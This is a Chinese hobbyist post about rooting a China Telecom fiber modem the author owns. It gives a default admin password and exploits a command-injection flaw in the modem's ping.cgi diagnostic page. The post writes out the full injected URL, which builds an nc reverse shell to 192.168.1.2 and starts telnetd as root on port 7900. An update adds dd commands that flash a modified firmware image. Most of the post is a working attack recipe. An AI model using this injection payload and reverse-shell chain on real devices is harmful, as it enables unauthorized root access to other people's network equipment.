前几天办了新宽带,电信又拿了个新品牌的光猫,看背面写的是兆能(好吧不认识T_T)
按照惯例打开192.168.1.1:8080 界面,结果自动跳到了新luci界面。用惯用手段获取密码:(小提示:在80界面密码栏直接输入nE7jA%5m即可登录8080,无需修改用户名)
打开ftp连接光猫,显示Pure_Ftpd(挺先进),用useradmin登录,看到了熟悉的romfile,下载到电脑发现没有加密!正当我激动之时发现里面并没有telnet设置……通过一番寻找找到8080端口的网页在/usr/share/web下,找到了ftpandTelnet.cgi这个文件,但用浏览器访问是,电信直接封死了……有关备份和更新的也同样被封死。。。那就只能通过其他方式了。
0.ftp:通过四处寻找脚本发现/var下有Speedtest脚本,可能是手机端测速功能的后端,ftp上传一个反弹shell脚本上去,但手机上点测速并没有效果,而且登录回去发现文件并未被修改。可能ftpd有权限设置
1.ttl:光猫后螺丝只上了两个螺丝,另外一侧是卡上去的(好省钱……),用一把尺子轻松拆开。正面有几块黑胶,拆开后底下有熟悉的四个触点,还贴心的标上了TX RX,明摆着让你用呢!但putty连上后失望了,需要登录。用e8c和useradmin/admin都显示error,方法不通。
2.网页漏洞:(1)起初以为telnet服务是启动的(nmap显示23端口是filtered),在luci页面中端口映射127.0.0.1:23至127.0.0.1:23打开23端口,telnet连接后是连接重置……压根telnetd就没起来!
(2)在8080页面有ping.cgi,输入127.0.0.1测试后链接变成了http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=127.0.0.1&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1,关键点:addr可修改!修改地址为diagAddrT=127.0.0.1|ls后并没有出现报错,显示内容正常!直接运行telnetd经过实验什么都没有发生……在窗口看不到错误原因,因此可以尝试寻找可以反弹shell的工具。通过which nc找到nc。尝试直接用nc -e /bin/sh反弹 果不其然没有-e选项。因此用http://192.168.1.1:8080/ping.cgi?diagIntfT=nas0.46&diagAddrT=&nc 192.168.1.2 8080|/bin/sh|nc 192.168.1.2 8081&diagTestTypeT=1&ippingversionT=4&repiNum=1&submit=1成功反弹出shell,但60s后会报错且无法连接,显然不是我们的目的。在nc中再次运行telnetd -l /bin/login 后成功,但telnet依旧无法连接。发现光猫有upnp功能,因此7900端口可能是开放,因此修改命令为telnetd -l /bin/login -p 7900,终于能连通。login处useradmin和密码成功登录且为root权限!发现系统内有很多有用的命令,但许多都在openwrt子系统(/opt/upt/framework内,是luci用到的系统),因此使用下列代码修复path:
export PATH="/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/opt/upt/framework/saf/rootfs/bin:/opt/upt/f
ramework/saf/rootfs/sbin:/opt/upt/framework/saf/rootfs/usr/bin:/opt/upt/framework/saf/rootfs/usr/sbin"
至此破解telnet结束。
(提供一个不需要nc直接网页访问就能开启telnet的链接:链接)
仍需解决的问题:整个系统除了openwrt系统外均为只读和tmpfs结合,无法保持任何文件修改。
==============分割线===============
11.28更新新的破解方式:刷写固件
1.通过前文提供的链接打开telnet
2.下载本人修改好的固件(仅更新busybox和启动脚本,绝无任何挖矿/病毒脚本,若不相信可自行编译。。。)
下载链接(MD5:dcdc95b09ff0bed6cad2aa7adbe22d45请务必进行检查!)
3.利用ftp上传文件(需先在应用与功能中打开FTP)
ftp 192.168.1.1 #登录账号为useradmin 密码在光猫背后
put mtd6new.img /mnt #在ftp连接后输入
4.连接telnet,输入以下命令
dd if=/mnt/mtd6new.img of=/dev/mtdblock6
dd if=/mnt/mtd6new.img of=/dev/mtdblock7
刷写时间较长,等运行完成后一定运行sync 和 saf info 查看刷写是否正常!若括号内为空请检查镜像是否上传正确并重新刷入!
5.刷写完成后记得reboot 耐心等待5分钟后telnet 192.168.1.1 7900 会出现熟悉的界面:
请务必使用busybox passwd 修改root密码!否则onu暴露在外网被当肉鸡概不负责!
(想不到吧,电信光猫里嵌了个openwrt!)mount发现根目录的确有overlay,剩余45M左右空间可以*折腾!cpu属于mips架构,大部分发行版都提供编译器,想要新功能可以自行添加,这里不再赘述。
注:系统内我自己编译了最新的全功能busybox 如果遇到命令不存在不妨使用busybox+命令试试?命令列表链接